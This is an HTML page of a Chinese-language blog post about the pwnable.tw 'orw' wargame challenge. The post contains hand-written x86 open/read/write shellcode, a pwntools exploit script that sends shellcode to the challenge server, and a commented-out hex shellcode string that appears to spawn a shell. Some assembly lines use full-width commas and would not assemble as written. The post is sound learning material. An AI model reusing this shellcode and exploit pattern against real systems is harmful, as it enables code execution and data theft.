<!DOCTYPE html>
<html>
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="utf-8">
  

  
  <title>Gumeng&#39;s Blog</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="description" content="pwnable.tw 之 orw题目提示：只能使用read，write，open三个syscall，那么我们只能手写汇编 https://wiki.mozilla.org/Security/Sandbox/Seccomphttp://syscalls.kernelgrok.com/  global START  START:     jmp MESSAGE  BACK:     pop ebx">
<meta name="keywords" content="Pwn,ICS,Dev">
<meta property="og:type" content="article">
<meta property="og:title" content="Gumeng&#39;s Blog">
<meta property="og:url" content="http://gumeng.fun/2018/10/24/2017-08-31-pwnable.tw之orw/index.html">
<meta property="og:site_name" content="Gumeng&#39;s Blog">
<meta property="og:description" content="pwnable.tw 之 orw题目提示：只能使用read，write，open三个syscall，那么我们只能手写汇编 https://wiki.mozilla.org/Security/Sandbox/Seccomphttp://syscalls.kernelgrok.com/  global START  START:     jmp MESSAGE  BACK:     pop ebx">
<meta property="og:locale" content="En">
<meta property="og:updated_time" content="2018-10-24T15:45:58.078Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Gumeng&#39;s Blog">
<meta name="twitter:description" content="pwnable.tw 之 orw题目提示：只能使用read，write，open三个syscall，那么我们只能手写汇编 https://wiki.mozilla.org/Security/Sandbox/Seccomphttp://syscalls.kernelgrok.com/  global START  START:     jmp MESSAGE  BACK:     pop ebx">
  
    <link rel="alternate" href="/atom.xml" title="Gumeng&#39;s Blog" type="application/atom+xml">
  
  
    <link rel="icon" href="/favicon.png">
  
  
    <link href="//fonts.googleapis.com/css?family=Source+Code+Pro" rel="stylesheet" type="text/css">
  
  <link rel="stylesheet" href="/css/style.css">
<link rel="stylesheet" href="/css/prism.css" type="text/css"></head>
</html>
<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">Gumeng&#39;s Blog</a>
      </h1>
      
        <h2 id="subtitle-wrap">
          <a href="/" id="subtitle">Pwner in ICS, Python Exploit developer</a>
        </h2>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
      </nav>
      <nav id="sub-nav">
        
          <a id="nav-rss-link" class="nav-icon" href="/atom.xml" title="RSS Feed"></a>
        
        <a id="nav-search-btn" class="nav-icon" title="Search"></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="Search"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="http://gumeng.fun"></form>
      </div>
    </div>
  </div>
</header>
      <div class="outer">
        <section id="main"><article id="post-2017-08-31-pwnable.tw之orw" class="article article-type-post" itemscope="" itemprop="blogPost">
  <div class="article-meta">
    <a href="/2018/10/24/2017-08-31-pwnable.tw之orw/" class="article-date">
  <time datetime="2018-10-24T15:45:58.076Z" itemprop="datePublished">2018-10-24</time>
</a>
    
  </div>
  <div class="article-inner">
    
    
    <div class="article-entry" itemprop="articleBody">
      
        <h1 id="pwnable-tw-之-orw"><a href="#pwnable-tw-之-orw" class="headerlink" title="pwnable.tw 之 orw"></a>pwnable.tw 之 orw</h1><p>题目提示：<br>只能使用read，write，open三个syscall，那么我们只能手写汇编</p>
<p><a href="https://wiki.mozilla.org/Security/Sandbox/Seccomp" target="_blank" rel="noopener">https://wiki.mozilla.org/Security/Sandbox/Seccomp</a><br><a href="http://syscalls.kernelgrok.com/" target="_blank" rel="noopener">http://syscalls.kernelgrok.com/</a> </p>
<pre><code>global START

START:
    jmp MESSAGE

BACK:
    pop ebx
    mov eax,5    
    mov ecx,0
    mov edx,7
    int 80h

    mov ebx，eax
    mov eax，3
    mov ecx，esp
    mov edx，100
    int 80h

    mov eax，4
    mov ebx，1
    mov ecx，esp
    mov edx，100
    int 80h

     xor ebx，ebx
    mov eax，1
    int 80h

MESSAGE:
    call BACK
    file db &apos;/home/orw/flag&apos;
    db 00
</code></pre><p>说实话，测试了一下libsecomp 发现还是不行，需要后续接着搞一下</p>
<blockquote>
<p>可以利用工具来返汇编，这里需要的是把0x8048640开始的0x60字节数据弄出来分析<br><a href="https://github.com/seccomp/libseccomp/blob/master/tools/scmp_bpf_disasm.c" target="_blank" rel="noopener">https://github.com/seccomp/libseccomp/blob/master/tools/scmp_bpf_disasm.c</a><br>将数据取出来保存为文本文件，然后直接反汇编就行了，可以看到这里允许3,4,5即open,read,write。<br>z<br>这部分需要实现，复现相关内容</p>
</blockquote>
<p>说实话，搞一下libsecom相关内容，还是需要一个功能性质的需求</p>
<p>还需需要好好学习下pwntools，功能太强大了，太牛了</p>
<pre><code>#!/usr/bin/env python
# encoding: utf-8

from pwn import *

p = process(&quot;./orw&quot;)
p = remote(&apos;chall.pwnable.tw&apos;, 10001)
context.log_level = &quot;debug&quot;
#shellcode = &apos;31C050B860A0040883C01350EA9885040833004831F648B82F62696E2F736800504889E74831D248C7C03B0000000F05&apos;.decode(&apos;hex&apos;)
#gdb.attach(proc.pidof(p)[0],&quot;b *0x08048559\nb *0x804858a\n&quot;)
p.recvuntil(&quot;:&quot;)
sc = shellcraft.pushstr(&quot;/home/orw/flag&quot;)
# 下面几个函数调用都是通过int 80h调用的，其中三个参数分别为ebx,ecx,edx
sc += shellcraft.open(&quot;esp&quot;,0,0)
sc += shellcraft.read(&quot;eax&quot;,&quot;esp&quot;,100)
sc += shellcraft.write(1,&quot;esp&quot;,100)
sc = asm(sc)
p.send(sc)
print p.recv(1000)
</code></pre>
      
    </div>
    <footer class="article-footer">
      <a data-url="http://gumeng.fun/2018/10/24/2017-08-31-pwnable.tw之orw/" data-id="cjtimehbx000x5waihamg2fc1" class="article-share-link">Share</a>
      
      
    </footer>
  </div>
  
    
<nav id="article-nav">
  
    <a href="/2018/10/24/2017-08-31-pwnable.tw之start/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Newer</strong>
      <div class="article-nav-title">
        
          (no title)
        
      </div>
    </a>
  
  
    <a href="/2018/10/24/2017-08-31-pwnable.kr学习/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Older</strong>
      <div class="article-nav-title"></div>
    </a>
  
</nav>

  
</article>

</section>
        
          <aside id="sidebar">
  
    

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Tags</h3>
    <div class="widget">
      <ul class="tag-list"><li class="tag-list-item"><a class="tag-list-link" href="/tags/Blog/">Blog</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Heap-Pwn/">Heap Pwn</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Pwn/">Pwn</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Tag Cloud</h3>
    <div class="widget tagcloud">
      <a href="/tags/Blog/" style="font-size: 20px;">Blog</a> <a href="/tags/Heap-Pwn/" style="font-size: 10px;">Heap Pwn</a> <a href="/tags/Pwn/" style="font-size: 10px;">Pwn</a>
    </div>
  </div>

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Archives</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2018/10/">October 2018</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2018/01/">January 2018</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2017/10/">October 2017</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2017/08/">August 2017</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Recent Posts</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2018/10/24/2018-10-24-escape/">escape</a>
          </li>
        
          <li>
            <a href="/2018/10/24/pip丢失问题/">(no title)</a>
          </li>
        
          <li>
            <a href="/2018/10/24/ROP攻击技术/">(no title)</a>
          </li>
        
          <li>
            <a href="/2018/10/24/2018-02-07-Ubuntu 16.04 搭建ARM 9 测试环境/">(no title)</a>
          </li>
        
          <li>
            <a href="/2018/10/24/2017-08-31-scapy fuzz部分源码解析/">(no title)</a>
          </li>
        
      </ul>
    </div>
  </div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      &copy; 2019 Gumeng<br>
      Powered by <a href="http://hexo.io/" target="_blank">Hexo</a>
    </div>
  </div>
</footer>
    </div>
    <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
</nav>
    

<script src="//ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js"></script>


  <link rel="stylesheet" href="/fancybox/jquery.fancybox.css">
  <script src="/fancybox/jquery.fancybox.pack.js"></script>


<script src="/js/script.js"></script>



  </div>
</body>
</html>